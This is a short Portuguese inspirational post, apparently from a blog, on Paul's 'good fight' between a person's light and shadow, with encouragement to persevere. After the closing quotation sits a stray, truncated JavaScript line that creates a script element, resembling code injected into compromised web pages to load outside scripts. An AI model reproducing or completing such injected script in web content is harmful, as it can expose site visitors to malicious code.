Ânimo para viver

O apóstolo Paulo comparou a vida a um campo de batalha onde cada um trava um bom combate. O bom combate é a luta entre sua parte de luz e a outra, de sombra. Sairá vencedora aquela à qual você der mais atenção, mostrar determinação e não desistir com as derrotas. Quanto maior sua escuridão, maior será o conflito e maior será o esforço que deverá fazer.

Na batalha haverá vitórias e derrotas com consequente fortalecimento, se houver avaliação e aproveitamento que trarão a sabedoria necessária. Toda ideia de fracasso, desânimo, incapacidade ou derrota deve ser rechaçada.

Paulo mostra seu bom combate em três momentos. No início, quando lamentava não fazer todo o bem que queria. Depois, quando afirmava que não era mais o que foi e, finalmente, quando afirmou que venceu o bom combate.

Antes de ser degolado pelo carrasco encarregado de executá-lo, mas que demonstrava vacilação e piedade, Paulo afirmou: “Não tenha pena de mim; tenha pena de você que vai continuar fazendo esse trabalho imundo. Eu cumpri meu dever e vou ao encontro do meu Senhor”.

Quando a sua parte luminosa ultrapassar sua escuridão, começará a sentir uma alegria natural. Após alguma derrota, verá que passou para um patamar mais elevado. Então, haverá cada vez mais alegria em compartilhar com os mais necessitados e perceberá que aparecerão amizades importantes que o auxiliarão na sua caminhada.

É assim que se entende o provérbio oriental: “Quando o discípulo está pronto o Mestre aparece”. O Mestre não significa necessariamente uma pessoa física. Pode ser um livro que você encontra, sua indicação ou o presente de alguém. Em casos mais resistentes poderá haver necessidade da ajuda de um terapeuta.

“Caminhe! Até que não exista mais o caminho e nem o caminhante, e só exista o caminhar”.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário